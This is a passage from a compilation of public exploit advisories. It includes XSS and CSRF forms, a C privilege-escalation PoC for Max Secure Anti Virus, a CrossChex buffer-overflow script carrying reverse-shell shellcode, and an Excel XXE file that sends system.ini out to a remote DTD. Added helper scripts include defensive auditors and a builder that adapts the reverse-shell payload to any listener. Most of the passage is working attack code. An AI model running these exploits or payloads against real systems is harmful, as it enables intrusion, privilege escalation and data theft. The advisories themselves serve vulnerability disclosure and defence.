            <input type="hidden" name="userId" value="-300" />
            <input type="hidden" name="heat_ensave_set" value="24" />
            <input type="hidden" name="heat_set" value="25.5" />
            <input type="submit" value="Set" />
          </form>
        </body>
      </html>

      Stored XSS (POST):
      ------------------

      <html>
        <body>
          <form action="http://192.168.0.24/app/command.php" method="POST">
            <input type="hidden" name="op" value="11" />
            <input type="hidden" name="name" value='Graph name"><script>confirm(document.cookie)</script>' />
            <input type="hidden" name="period" value="2" />
            <input type="hidden" name="gg" value="6" />
            <input type="hidden" name="ggf" value="6" />
            <input type="hidden" name="mm" value="11" />
            <input type="hidden" name="mmf" value="11" />
            <input type="hidden" name="aa" value="2019" />
            <input type="hidden" name="aaf" value="2019" />
            <input type="hidden" name="param" value="[1]" />
            <input type="submit" value="Send" />
          </form>
        </body>
      </html>

      Reflected XSS (POST):
      ---------------------

      <html>
        <body>
          <form action="http://192.168.0.24/refresh.php">
            <input type="hidden" name="param[0][]" value="switch0251<script>confirm(document.cookie)</script>" />
            <input type="hidden" name="param[0][]" value="0251" />
            <input type="hidden" name="param[0][]" value="switch" />
            <input type="hidden" name="param[1][]" value="switch1250" />
            <input type="hidden" name="param[1][]" value="1250" />
            <input type="hidden" name="param[1][]" value="switch" />
            <input type="submit" value="Send" />
          </form>
        </body>
      </html>
19. # Exploit Title: Max Secure Anti Virus Plus 19.0.4.020 - Insecure File Permissions
# Discovery by: hyp3rlinx
# Date: 2019-12-02
# Vendor Homepage: www.maxpcsecure.com
# Tested Version: 19.0.4.020
# CVE: N/A

[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/MAX-SECURE-PLUS-ANTIVIRUS-INSECURE-PERMISSIONS.txt
[+] ISR: ApparitionSec

[Vendor]
www.maxpcsecure.com

[Affected Product Code Base]
Max Secure Anti Virus Plus - 19.0.4.020

File hash: ab1dda23ad3955eb18fdb75f3cbc308a msplusx64.exe

[Vulnerability Type]
Insecure Permissions

[CVE Reference]
N/A

[Security Issue]
Max Secure Anti Virus Plus 19.0.4.020 has Insecure Permissions on the installation directory.
Local attackers or malware running at low integrity can replace a .exe or .dll file to achieve privilege escalation.

C:\Program Files\Max Secure Anti Virus Plus>cacls * | more
C:\Program Files\Max Secure Anti Virus Plus\7z.dll NT AUTHORITY\Authenticated Users:(ID)F
                                                   BUILTIN\Users:(ID)F
                                                   NT AUTHORITY\SYSTEM:(ID)F
                                                   BUILTIN\Administrators:(ID)F

[Affected Component]
Permissions on installation directory

[Exploit/POC]

#include <stdio.h>
#include <stdlib.h>
#include <windows.h>

#define TARGET "C:\\Program Files\\Max Secure Anti Virus Plus\\MaxSDUI.exe"
#define TMP "C:\\Program Files\\Max Secure Anti Virus Plus\\2.exe"
#define DISABLED_TARGET "C:\\Program Files\\Max Secure Anti Virus Plus\\666.tmp"

/* Max Secure Anti Virus Plus PoC By hyp3rlinx */

BOOL PWNED = FALSE;

BOOL FileExists(LPCTSTR szPath){
    DWORD dwAttrib = GetFileAttributes(szPath);
    return (dwAttrib != INVALID_FILE_ATTRIBUTES && !(dwAttrib & FILE_ATTRIBUTE_DIRECTORY));
}

int main(void){
    /* First run: park a copy of the legitimate MaxSDUI.exe as 666.tmp before replacing it. */
    if(!FileExists(DISABLED_TARGET)){
        CopyFile(TARGET, TMP, FALSE);
        Sleep(1000);
        CopyFile(TMP, DISABLED_TARGET, FALSE);
        printf("[+] Max Secure Anti Virus Plus EoP PoC\n");
        Sleep(1000);
        printf("[+] Disabled MaxSDUI.exe ...\n");
        Sleep(300);
    }else{
        /* 666.tmp already exists: this process is the PoC running in place of the vendor EXE. */
        PWNED = TRUE;
    }

    if(!PWNED){
        char fname[MAX_PATH];
        DWORD size = GetModuleFileNameA(NULL, fname, MAX_PATH);
        if (size){
            printf("[+] Copying exploit to vuln dir...\n");
            Sleep(1000);
            /* The install directory is writable by Users, so the vendor EXE can simply be overwritten. */
            CopyFile(fname, TARGET, FALSE);
            printf("[+] Replaced legit Max Secure EXE...\n");
            Sleep(2000);
            printf("[+] Done!\n");
            MoveFile(fname, "C:\\Program Files\\Max Secure Anti Virus Plus\\MaxPwn.lnk");
            Sleep(1000);
            exit(0);
        }
    }else{
        if(FileExists(TMP)){
            remove(TMP);
        }
        printf("[+] Max Secure Anti Virus Plus PWNED!!!\n");
        printf("[+] hyp3rlinx\n");
        system("pause");
    }
    return 0;
}

[POC Video URL]
https://www.youtube.com/watch?v=DXSV5geXkTw

[Network Access]
Local

[Severity]
High

[Disclosure Timeline]
Vendor Notification: November 19, 2019
Vendor: "received a reply they will fix soon"
Status request: November 24, 2019
No replies other than automated response.
November 29, 2019 : Public Disclosure

[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c). hyp3rlinx
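The cacls listing above is the whole finding: Users and Authenticated Users hold Full control (F) on binaries under Program Files, so any local account can swap them out. As an added example, not the advisory's code, here is a small audit that parses cacls-style output and flags every entry granting a low-privilege principal a write-class right (F, C or W). The sample listing is constructed from the advisory's output plus one correctly permissioned file; the principal list and the domain-matching heuristic are mine.

```python
import re
from typing import Dict, List, Tuple

# Principals any local account can act as; write-class rights for them on a
# vendor binary are exactly what the PoC above abuses. (Assumed list.)
LOW_PRIV_PRINCIPALS = {
    "EVERYONE",
    "BUILTIN\\USERS",
    "NT AUTHORITY\\AUTHENTICATED USERS",
    "NT AUTHORITY\\INTERACTIVE",
}
# cacls rights letters that allow replacing or modifying a file: Full, Change, Write.
WRITE_CLASS = set("FCW")

# One ACE as cacls prints it: [DOMAIN\]Name:(OI)(CI)(ID)F. The optional domain is
# restricted to upper-case names (NT AUTHORITY, BUILTIN, DESKTOP-1) so that a file
# name containing spaces on the same line is not mistaken for a domain.
ACE = (r"(?P<principal>(?:[A-Z][A-Z0-9 _-]*\\)?[^\\:]+?):"
       r"(?P<inherit>(?:\([A-Z]+\))*)(?P<rights>[A-Z]+)")
PATH_ACE_RE = re.compile(r"^(?P<path>[A-Za-z]:\\.*?)\s+" + ACE + r"\s*$")
ACE_ONLY_RE = re.compile(r"^\s*" + ACE + r"\s*$")


def parse_cacls(output: str) -> Dict[str, List[Tuple[str, str]]]:
    """Map each path to its (principal, rights) entries. cacls prints the first
    ACE on the path line and the rest on indented continuation lines."""
    acls: Dict[str, List[Tuple[str, str]]] = {}
    current = None
    for line in output.splitlines():
        if not line.strip():
            continue
        m = PATH_ACE_RE.match(line)
        if m:
            current = m.group("path")
            acls.setdefault(current, [])
        else:
            m = ACE_ONLY_RE.match(line)
            if m is None or current is None:
                continue  # prompt line, "special access" detail, etc.
        acls[current].append((m.group("principal"), m.group("rights")))
    return acls


def weak_entries(acls: Dict[str, List[Tuple[str, str]]]) -> List[Tuple[str, str, str]]:
    """(path, principal, rights) for every file a low-privilege principal can write."""
    return [
        (path, principal, rights)
        for path, aces in acls.items()
        for principal, rights in aces
        if principal.upper() in LOW_PRIV_PRINCIPALS and set(rights) & WRITE_CLASS
    ]


# Constructed from the advisory's listing, plus a benign file with read-only Users access.
SAMPLE_CACLS = r"""
C:\Program Files\Max Secure Anti Virus Plus>cacls * | more
C:\Program Files\Max Secure Anti Virus Plus\7z.dll NT AUTHORITY\Authenticated Users:(ID)F
                                                   BUILTIN\Users:(ID)F
                                                   NT AUTHORITY\SYSTEM:(ID)F
                                                   BUILTIN\Administrators:(ID)F
C:\Program Files\Max Secure Anti Virus Plus\MaxSDUI.exe NT AUTHORITY\Authenticated Users:(ID)F
                                                        BUILTIN\Users:(ID)F
C:\Program Files\Benign App\benign.exe BUILTIN\Users:(ID)R
                                       NT AUTHORITY\SYSTEM:(ID)F
                                       BUILTIN\Administrators:(ID)F
"""

if __name__ == "__main__":
    for path, principal, rights in weak_entries(parse_cacls(SAMPLE_CACLS)):
        print("WRITABLE BY %-40s %-3s %s" % (principal, rights, path))
```

To audit a real install, capture `cacls "C:\Program Files\<app>\*"` to a file and pass its text to parse_cacls; the benign entry in the sample shows the audit staying quiet when Users only hold R.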
20. # Exploit Title: Dokuwiki 2018-04-22b - Username Enumeration
# Date: 2019-12-01
# Exploit Author: Talha ŞEN
# Vendor Homepage: https://www.dokuwiki.org/dokuwiki
# Software Link: https://download.dokuwiki.org/
# Version: 2018-04-22b "Greebo"
# Tested on:
#   Alpine Linux 3.5 (docker image)
#   PHP 5.6.30
#   Apache/2.4.25 (Unix)
# CVE :

# On the login page there is a "set new password" page, as below:
#   Forgotten your password? Get a new one: Set new password
# On this page there is a username enumeration vulnerability.

# Testing for an invalid user:

POST /doku.php?id=start&do=resendpwd HTTP/1.1

sectok=&do=resendpwd&save=1&login=sss

# Response for the invalid user (sss):

<div class="error">Sorry, we can't find this user in our database.</div>

========================================================================

# Testing for a valid user:

POST /doku.php?id=start&do=resendpwd HTTP/1.1

sectok=&do=resendpwd&save=1&login=admin

# Response for the valid user (admin):

<div class="error">There was an unexpected problem communicating with SMTP: Could not open SMTP Port.</div>
<div class="error">Looks like there was an error on sending the password mail. Please contact the admin!</div>
21. # Exploit Title: Nsauditor 3.1.8.0 - 'Key' Denial of Service (PoC)
# Discovery by: SajjadBnd
# Date: 2019-11-30
# Vendor Homepage: http://www.nsauditor.com
# Software Link: http://www.nsauditor.com/downloads/nsauditor_setup.exe
# Tested Version: 3.1.8.0
# Vulnerability Type: Denial of Service (DoS) Local
# Tested on OS: Windows 10 - Pro
# Email : [email protected]

# About App
# Nsauditor Network Security Auditor is a powerful network security tool designed to scan networks
# and hosts for vulnerabilities, and to provide security alerts. Nsauditor network auditor checks an enterprise
# network for all potential methods that a hacker might use to attack it and creates a report of potential
# problems that were found. Nsauditor network auditing software significantly reduces the total cost of
# network management in enterprise environments by enabling IT personnel and systems administrators to gather
# a wide range of information from all the computers in the network without installing server-side applications
# on these computers, and to create a report of potential problems that were found.

# POC
# 1. Run the python script; it will create a new file "dos.txt"
# 2. Run Nsauditor and click on "Register -> Enter Registration Code"
# 3. Paste the content of dos.txt into the field 'Key'
# 4. Click 'OK'
# 5. Crashed ;)

#!/usr/bin/env python

# 1000 bytes of 'A' pasted into the 'Key' field is enough to crash the registration dialog.
buffer = "\x41" * 1000

try:
    f = open("dos.txt", "w")
    print("[+] Creating %s bytes DOS payload.." % len(buffer))
    f.write(buffer)
    f.close()
    print("[+] File created!")
except IOError:
    print("File cannot be created")
22. # Exploit Title: Anviz CrossChex 4.3.12 - Local Buffer Overflow
# Date: 2019-11-30
# Exploit Author: Luis Catarino & Pedro Rodrigues
# Vendor Homepage: https://www.anviz.com/
# Software Link: https://www.anviz.com/download.html
# Version: Crosschex Standard x86 <= V4.3.12
# Tested on: 4.3.8.0, 4.3.12
# CVE : N/A
# More info: https://www.0x90.zone/multiple/reverse/2019/11/28/Anviz-pwn.html

import socket
import time
import sys

# Scapy for the broadcast packet with custom sport
from scapy.all import Raw, IP, UDP, Ether, sendp

# shellcode working calc.exe
calculator_payload = b"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b"
calculator_payload += b"\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7"
calculator_payload += b"\x4a\x26\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf"
calculator_payload += b"\x0d\x01\xc7\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c"
calculator_payload += b"\x8b\x4c\x11\x78\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01"
calculator_payload += b"\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b\x01\xd6\x31"
calculator_payload += b"\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03\x7d"
calculator_payload += b"\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66"
calculator_payload += b"\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0"
calculator_payload += b"\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f"
calculator_payload += b"\x5f\x5a\x8b\x12\xeb\x8d\x5d\x6a\x01\x8d\x85\xb2\x00"
calculator_payload += b"\x00\x00\x50\x68\x31\x8b\x6f\x87\xff\xd5\xbb\xf0\xb5"
calculator_payload += b"\xa2\x56\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a"
calculator_payload += b"\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53"
calculator_payload += b"\xff\xd5\x63\x61\x6c\x63\x2e\x65\x78\x65\x00"

# shellcode windows x86 reverse_shell (part 1, ends with the `push` opcode for the IP)
shell_payload_1 = b"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b"
shell_payload_1 += b"\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7"
shell_payload_1 += b"\x4a\x26\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf"
shell_payload_1 += b"\x0d\x01\xc7\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c"
shell_payload_1 += b"\x8b\x4c\x11\x78\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01"
shell_payload_1 += b"\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b\x01\xd6\x31"
shell_payload_1 += b"\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03\x7d"
shell_payload_1 += b"\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66"
shell_payload_1 += b"\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0"
shell_payload_1 += b"\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f"
shell_payload_1 += b"\x5f\x5a\x8b\x12\xeb\x8d\x5d\x68\x33\x32\x00\x00\x68"
shell_payload_1 += b"\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8"
shell_payload_1 += b"\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00"
shell_payload_1 += b"\xff\xd5\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea\x0f"
shell_payload_1 += b"\xdf\xe0\xff\xd5\x97\x6a\x05\x68"

# shellcode windows x86 reverse_shell (part_2, starts with `push 0x0002|port 445`)
shell_payload_2 = b"\x68\x02\x00\x01\xbd\x89\xe6\x6a\x10\x56\x57\x68\x99\xa5"
shell_payload_2 += b"\x74\x61\xff\xd5\x85\xc0\x74\x0c\xff\x4e\x08\x75\xec"
shell_payload_2 += b"\x68\xf0\xb5\xa2\x56\xff\xd5\x68\x63\x6d\x64\x00\x89"
shell_payload_2 += b"\xe3\x57\x57\x57\x31\xf6\x6a\x12\x59\x56\xe2\xfd\x66"
shell_payload_2 += b"\xc7\x44\x24\x3c\x01\x01\x8d\x44\x24\x10\xc6\x00\x44"
shell_payload_2 += b"\x54\x50\x56\x56\x56\x46\x56\x4e\x56\x56\x53\x56\x68"
shell_payload_2 += b"\x79\xcc\x3f\x86\xff\xd5\x89\xe0\x4e\x56\x46\xff\x30"
shell_payload_2 += b"\x68\x08\x87\x1d\x60\xff\xd5\xbb\xf0\xb5\xa2\x56\x68"
shell_payload_2 += b"\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0"
shell_payload_2 += b"\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5"


def ipToShellcode(ip):
    # The four octets in network order, as the `push <ip>` in shell_payload_1 expects.
    # (Building the string with hex() dropped the leading zero of any octet below 16.)
    return socket.inet_aton(ip)


# sport has to be 5060
def sendFuzzingUDPBroadcast(ip="255.255.255.255", sport=5050, dport=5060):
    request = b"A" * 77                 # Original payload substitute
    request += b"B" * 184
    request += b"\x07\x18\x42\x00"      # EIP - 00421807 crosscheck_standard.exe
    request += b"A" * 4                 # 269 bytes

    if len(sys.argv) > 2:
        request = request + shell_payload_1 + ipToShellcode(sys.argv[2]) + shell_payload_2
    else:
        request = request + calculator_payload

    sendp(
        Ether(src='00:00:00:00:00:00', dst="ff:ff:ff:ff:ff:ff")
        / IP(src=ip, dst='255.255.255.255')
        / UDP(sport=sport, dport=dport)
        / Raw(load=request),
        iface=sys.argv[1]
    )


def setFuzzUDPServer(ip='', port=5050, timeout=150):
    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    except socket.error:
        print('[!] Failed to create server socket')
        sys.exit()

    try:
        s.bind(('', port))
    except socket.error:
        print('[*] Server socket bind failed')
        sys.exit()

    print('[*] Waiting for crosschex')
    s.settimeout(timeout)
    timeout = time.time() + timeout
    responses = []
    while True:
        if time.time() > timeout:
            break
        try:
            # CrossChex announces itself on UDP/5050; answer with the overflow broadcast.
            response = s.recvfrom(1024)
            print(response)
            responses.append(response)
            sendFuzzingUDPBroadcast(ip=ip)
            response = s.recvfrom(1024)
        except socket.timeout:
            print("[!] Error with UDP server")
    s.close()
    return responses


nargs = len(sys.argv)
if nargs < 2:
    print("[*] Usage: python3 %s <network_interface> [<ip>]\n\tif you don't pass the ip of the LHOST it will drop a calculator, if you set the ip it will send a reverse shell to port 445" % sys.argv[0])
    sys.exit(0)

setFuzzUDPServer()
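The exploit above hard-codes the layout the authors found by fuzzing: 77 + 184 filler bytes, the EIP overwrite 0x00421807, four bytes of slack, then the shellcode with the listener address spliced into the `push` that builds the sockaddr_in. As an added example (not the authors' code) here is the offset-finding step with a Metasploit-style cyclic pattern, and a payload builder that generalises the splice so the listener port can vary as well as the address. The offsets and EIP value are the advisory's; the pattern routines, the port generalisation and the one-byte stand-in stubs are mine.

```python
import socket
import string
import struct

# Layout the advisory reports for crosschex_standard.exe (UDP, dport 5060).
FILLER_A = 77                        # "Original payload substitute"
FILLER_B = 184                       # padding up to the saved return address
EIP = 0x00421807                     # address in crosschex_standard.exe the exploit returns into
EIP_OFFSET = FILLER_A + FILLER_B     # 261


def pattern_create(length: int) -> bytes:
    """Metasploit-style cyclic pattern (Aa0Aa1Aa2...): no 4-byte window repeats
    within the first 20280 bytes, so the dword found in EIP identifies an offset."""
    out = bytearray()
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                out += (upper + lower + digit).encode()
                if len(out) >= length:
                    return bytes(out[:length])
    return bytes(out[:length])


def pattern_offset(pattern: bytes, eip_value: int) -> int:
    """Offset of the saved return address, given the EIP dword read in the
    debugger (x86 is little-endian, so pack it back into bytes before searching)."""
    return pattern.find(struct.pack("<I", eip_value))


def sockaddr_pushes(lhost: str, lport: int):
    """The two PUSH imm32 the reverse-shell stub uses to build its sockaddr_in:
    push <ip in network order> ; push <AF_INET as 0x0002 LE, then port in network order>.
    For 192.168.1.5:445 this reproduces the advisory's ...\\x68 + ip and \\x68\\x02\\x00\\x01\\xbd."""
    ip_push = b"\x68" + socket.inet_aton(lhost)
    port_push = b"\x68" + struct.pack("<H", 2) + struct.pack(">H", lport)
    return ip_push, port_push


def stage_shellcode(stub_before_ip: bytes, stub_after_port: bytes, lhost: str, lport: int) -> bytes:
    """Splice address and port between two halves of a reverse-shell stub.
    stub_before_ip ends just before the `push <ip>` opcode; stub_after_port
    starts right after the `push <family|port>` instruction."""
    ip_push, port_push = sockaddr_pushes(lhost, lport)
    return stub_before_ip + ip_push + port_push + stub_after_port


def build_request(shellcode: bytes) -> bytes:
    """Filler, EIP overwrite, 4 bytes of slack, then the shellcode (the exploit's layout)."""
    req = b"A" * FILLER_A + b"B" * FILLER_B
    req += struct.pack("<I", EIP)
    req += b"A" * 4
    return req + shellcode


if __name__ == "__main__":
    # Step 1: crash with a pattern and read EIP; the read is simulated here.
    pat = pattern_create(400)
    seen_eip = struct.unpack("<I", pat[EIP_OFFSET:EIP_OFFSET + 4])[0]
    print("EIP overwrite offset:", pattern_offset(pat, seen_eip))
    # Step 2: constructed one-byte stubs stand in for the real shellcode halves.
    sc = stage_shellcode(b"\x90", b"\xcc", "192.168.1.5", 445)
    print(build_request(sc).hex())
```

Note that the EIP value contains a null byte; that is harmless here because the payload travels in a raw UDP datagram rather than through a string copy, which is a detail worth confirming before reusing the layout against another build.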
23. # Exploit Title: Online Invoicing System 2.6 - 'description' Persistent Cross-Site Scripting
# Date: 2019-11-29
# Exploit Author: Cemal Cihad ÇİFTÇİ
# Vendor Homepage: https://bigprof.com
# Software Download Link : https://github.com/bigprof-software/online-invoicing-system
# Software : Online Invoicing System
# Version : 2.6
# Vulnerability Type : Cross-site Scripting
# Vulnerability : Stored XSS

# Stored XSS has been discovered in the Online Invoicing System created by bigprof/AppGini,
# in the editmembers section. The "description" parameter is affected by this vulnerability.
# payload: <script>alert(123);</script>

# HTTP POST request

POST /inovicing/app/admin/pageEditGroup.php HTTP/1.1
Host: 10.10.10.160
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 464
Origin: http://10.10.10.160
Connection: close
Referer: http://10.10.10.160/inovicing/app/admin/pageEditGroup.php?groupID=2
Cookie: inventory=4eg101l42apiuvutr7vguma5ar; online_inovicing_system=vl8ml5or8sgdee9ep9lnhglk69
Upgrade-Insecure-Requests: 1

groupID=2&name=Admins&description=%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E&visitorSignup=0&invoices_insert=1&invoices_view=3&invoices_edit=3&invoices_delete=3&clients_insert=1&clients_view=3&clients_edit=3&clients_delete=3&item_prices_insert=1&item_prices_view=3&item_prices_edit=3&item_prices_delete=3&invoice_items_insert=1&invoice_items_view=3&invoice_items_edit=3&invoice_items_delete=3&items_insert=1&items_view=3&items_edit=3&items_delete=3&saveChanges=1
24. # Exploit Title: Microsoft Excel 2016 1901 - XML External Entity Injection
# Discovery by: hyp3rlinx
# Date: 2019-12-02
# Vendor Homepage: www.microsoft.com
# Tested Version: 2016 v1901
# CVE: N/A

[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-EXCEL-2016-v1901-IMPORT-ERROR-EXTERNAL-ENTITY-INJECTION.txt
[+] ISR: ApparitionSec

[Vendor]
www.microsoft.com

[Product]
Excel 2016 v1901

Microsoft Excel is a spreadsheet developed by Microsoft for Windows, macOS, Android and iOS.
It features calculation, graphing tools, pivot tables, and a macro programming language called Visual Basic for Applications.

[CVE]
N/A

[Vulnerability Type]
Error Import Based XML External Entity Injection

[Security Issue]
Excel's query-from-file feature is vulnerable to "Error" based XML External Entity attacks if the user chooses
the "Import as Html page" functionality upon receiving errors importing a specially crafted XML file.
This can result in potential remote data exfiltration; user interaction is required to exploit this vulnerability.

Tested successfully on Windows 10, .NET framework version v4.0.30319.

C:\>dir /b %windir%\Microsoft.NET\Framework\v*
v4.0.30319

[Exploit/POC]
Create a new ".xlsx" file, then go to the Data tab and choose 'New Query/From File/From XML'

1) You will get an error like:

"Error: Unable to connect
We encountered an error while trying to connect."

The user will then get an option to 'Edit' where they can import the file as an HTML file.

Result: Local data can be exfiltrated to a remote server.

2) Excel will then give you the option to 'Edit' and import as 'Html Page' from the drop down menu in Excel.
Once the user has chosen to import as HTML, the XXE attack will succeed, e.g.:

127.0.0.1 - - [05/Mar/2019 15:31:16] "GET /?;%20for%2016-bit%20app%20support[386Enh]woafont=dosapp.fonEGA80WOA.FON=EGA80WOA.FO /1.1" 200 -

Malicious XML file to load as New Data Query "test.xml"

<?xml version='1.0'?>
<!DOCTYPE root [
<!ENTITY % file SYSTEM 'C:\Windows\system.ini'>
<!ENTITY % dtd SYSTEM 'http://127.0.0.1:8000/payload.dtd'>
%dtd;]>
<pwn>&send;</pwn>

[Network Access]
Local

[Severity]
Medium

[Disclosure Timeline]
Vendor Notification: May 10, 2019
MSRC: May 17, 2019 "case did not meet the bar for servicing as a Security Release. Engineering Team may or may not fix in a future version of the release."
November 30, 2019 : Public Disclosure

[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c). hyp3rlinx
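test.xml above is a textbook out-of-band XXE: one parameter entity reads C:\Windows\system.ini, a second fetches an attacker-controlled DTD, and the general entity that DTD defines carries the file contents out in the GET seen in the server log. The following is an added example, not part of the advisory: a pre-flight audit built on the standard library's expat parser that reports the DOCTYPE, every entity declaration carrying a SYSTEM identifier and every external entity the parser would have fetched, while deliberately resolving none of them. The suspicion rule and the benign sample document are mine; the malicious document is the advisory's test.xml reproduced as a bytes literal.

```python
import xml.parsers.expat as expat


def audit_xml(data: bytes) -> dict:
    """Parse with expat but resolve nothing: record the DOCTYPE, every entity
    declaration, every external entity expat wanted to fetch, and any entity
    left unresolved because its definition lives in an unfetched external DTD."""
    report = {"doctype": None, "entities": [], "external_refs": [], "skipped": [], "parse_error": None}
    parser = expat.ParserCreate()
    # Without this, expat ignores %dtd; in the internal subset and we would never see it.
    parser.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_ALWAYS)

    def start_doctype(name, system_id, public_id, has_internal_subset):
        report["doctype"] = {"name": name, "system_id": system_id,
                             "internal_subset": bool(has_internal_subset)}

    def entity_decl(name, is_param, value, base, system_id, public_id, notation):
        report["entities"].append({"name": ("%" if is_param else "") + name,
                                   "system_id": system_id, "value": value})

    def external_ref(context, base, system_id, public_id):
        report["external_refs"].append(system_id)
        return 1  # tell expat to carry on; we fetch nothing

    def skipped(name, is_param):
        report["skipped"].append(("%" if is_param else "&") + name)

    parser.StartDoctypeDeclHandler = start_doctype
    parser.EntityDeclHandler = entity_decl
    parser.ExternalEntityRefHandler = external_ref
    parser.SkippedEntityHandler = skipped
    try:
        parser.Parse(data, True)
    except expat.ExpatError as exc:
        report["parse_error"] = str(exc)
    return report


def is_xxe_suspect(report: dict) -> bool:
    """Reject if any entity, or the DTD itself, points outside the document."""
    if any(e["system_id"] for e in report["entities"]):
        return True
    if report["external_refs"]:
        return True
    doctype = report["doctype"]
    return bool(doctype and doctype["system_id"])


# The advisory's test.xml as a bytes literal, and a constructed benign document.
ADVISORY_XML = (
    b"<?xml version='1.0'?>\n"
    b"<!DOCTYPE root [\n"
    b"<!ENTITY % file SYSTEM 'C:\\Windows\\system.ini'>\n"
    b"<!ENTITY % dtd SYSTEM 'http://127.0.0.1:8000/payload.dtd'>\n"
    b"%dtd;]>\n"
    b"<pwn>&send;</pwn>\n"
)
BENIGN_XML = b"<?xml version='1.0'?><rows><row id='1'>ok</row></rows>"

if __name__ == "__main__":
    for label, doc in (("test.xml", ADVISORY_XML), ("benign", BENIGN_XML)):
        rep = audit_xml(doc)
        print(label, "SUSPECT" if is_xxe_suspect(rep) else "clean", rep)
```

The audit runs before any real parse and needs no network access; a document that trips it should be rejected rather than handed to an importer that, like the Excel path above, may quietly resolve the entities on the user's behalf.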
25. # Exploit Title: Intelbras Router RF1200 1.1.3 - Cross-Site Request Forgery
# Date: 2019-11-06
# Exploit Author: Joas Antonio
# Vendor Homepage: intelbras.com.br
# Software Link: https://www.intelbras.com/pt-br/roteador-wireless-smart-dual-band-action-rf-1200
# Version: 1.1.3 (REQUIRED)
# Tested on: Windows
# CVE : CVE-2019-19516

#POC1:

<html>
  <body>
    <form method="POST" action="http://IPROUTERRF1200/login/Auth">
      <input type="hidden" name="username" value="admin"/>
      <input type="hidden" name="password" value="21232f297a57a5a743894a0e4a801fc3"/> <!-- password admin -->
      <input type="submit" value="Submit">
    </form>
  </body>
</html>